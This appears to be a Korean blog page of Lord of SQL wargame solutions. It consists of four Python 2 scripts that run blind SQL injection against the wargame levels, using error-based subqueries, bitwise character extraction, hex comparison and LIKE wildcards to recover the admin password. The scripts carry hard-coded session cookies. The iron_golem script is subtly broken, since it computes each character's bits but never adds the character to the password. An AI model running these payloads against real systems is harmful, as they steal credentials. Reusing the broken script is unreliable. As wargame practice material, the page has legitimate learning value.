'Wargame/Lord of SQL'에 해당되는 글 44건

깨진 문제.

깨진 문제.

import urllib2

def request(data):
    url = "https://los.eagle-jump.org/dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php?pw="+urllib2.quote(data)
    req = urllib2.Request(url)
    req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
    req.add_header('Cookie','__cfduid=dc3f1581bf2ce11c70afbb877548363c31517875851; PHPSESSID=lua2edl01o0446vgm61mr0dar6')
    response = urllib2.urlopen(req).read()

    if "addslashes" in str(response):
        return True
    else:
        return False

length = 0
admin_pw = ""
binary = ""

for i in range(0,100):
    payload = "' or 1=1  and id='admin' and 1=(select "+str(i)+" in (length(pw),(select 1 union select 2)))#"
    if request(payload)==True:
        length = i
        break

print "[*]Admin Password Length = " + str(length)


for j in range(1,length+1):
    binary = ""
    for i in range(1,9):
        payload = "' or id='admin' and 1=(select 1 in (substring(lpad(bin(ord(substring(pw,"+str(j)+",1))),8,0),"+str(i)+",1),(select 1 union select 2)))#"
        if request(payload)==True:
            binary += "1"
        else:
            binary += "0"
    admin_pw += chr(int(binary,2))
    print "[-]Admin Password = " + admin_pw

print "[*]Admin Password = " + admin_pw

import urllib2

def request(data):
    url = "https://los.eagle-jump.org/iron_golem_d54668ae66cb6f43e92468775b1d1e38.php?pw="+urllib2.quote(data)
    req = urllib2.Request(url)
    req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
    req.add_header('Cookie','__cfduid=dc3f1581bf2ce11c70afbb877548363c31517875851; PHPSESSID=lua2edl01o0446vgm61mr0dar6')
    response = urllib2.urlopen(req).read()

    if "more than 1 row" in str(response):
        return True
    else:
        return False

length = 0
admin_pw = ""
binary = ""

for i in range(0,100):
    payload = "' or id='admin' and if(length(pw)="+str(i)+",(select 1 union select 2),1)#"
    if request(payload)==True:
        length = i
        break

print "[*]Admin Password Length = " + str(length)


for j in range(1,length+1):
    binary = ""
    for i in range(1,9):
        payload = "' or id='admin' and if(substring(lpad(bin(ord(substring(pw,"+str(j)+",1))),8,0),"+str(i)+",1)=1,(select 1 union select 2),1)#"
        if request(payload)==True:
            binary += "1"
        else:
            binary += "0"
    print "[-]Admin Password = " + admin_pw

print "[*]Admin Password = " + admin_pw

import urllib2

def request(data):
    url = "https://los.eagle-jump.org/xavis_fd4389515d6540477114ec3c79623afe.php?pw="+urllib2.quote(data)
    req = urllib2.Request(url)
    req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
    req.add_header('Cookie','__cfduid=dc3f1581bf2ce11c70afbb877548363c31517875851; PHPSESSID=4781bkenk59ojptdqpoj0um423')
    response = urllib2.urlopen(req).read()

    if "Hello admin" in str(response):
        return True
    else:
        return False

length = 0
admin_pw = ""
strings = "1234567890abcdef"

for i in range(0,100):
    payload = "' or id='admin' and length(hex(pw))="+str(i)+"#"
    if request(payload)==True:
        length = i
        break

print "[*]Admin Password Length = " + str(length)


for j in range(1,length+1):
    for i in range(0,len(strings)):
        payload = "' or id='admin' and right(lpad(hex(pw),"+str(j)+",space(0)),1)='"+strings[i]+"'#"
        if request(payload)==True:
            admin_pw += strings[i]
            print "[-]Admin Password = " + admin_pw
            break

print "[*]Admin Password = " + admin_pw

import urllib2

def request(data):
    url = "https://los.eagle-jump.org/assassin_bec1c90a48bc3a9f95fbf0c8ae8c88e1.php?pw="+urllib2.quote(data)
    req = urllib2.Request(url)
    req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
    req.add_header('Cookie','__cfduid=d8ef4b715b1243db43a171dd9c1503f641517927129; PHPSESSID=dp23m3nrh8cfflj2iga3np4t46')
    response = urllib2.urlopen(req).read()

    if "Hello admin" in str(response):
        return "admin"
    elif "Hello guest" in str(response):
        return "guest"
    else:
        return False

length = 0
admin_pw = ""
strings = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@"
tmp = ""
tmp1 = 0
payload = ""

for i in range(1,51):
    payload += "_"
    result = request(payload)
    if result=="admin":
        length = i
        break
    if result=="guest":
        tmp1 = i
    if i==50:
        length=tmp1



print "[*]Admin Password Length = " + str(length)


for j in range(1,length+1):
    for i in range(0,len(strings)):
        payload = admin_pw+strings[i]+"_"*(8-j)
        result = request(payload)
        if result == "admin":
            admin_pw += strings[i]
            print "[-]Admin Password = " + admin_pw
            break
        if result == "guest":
            tmp = strings[i]
        if i==len(strings)-1:
            admin_pw+=tmp

print "[*]Admin Password = " + admin_pw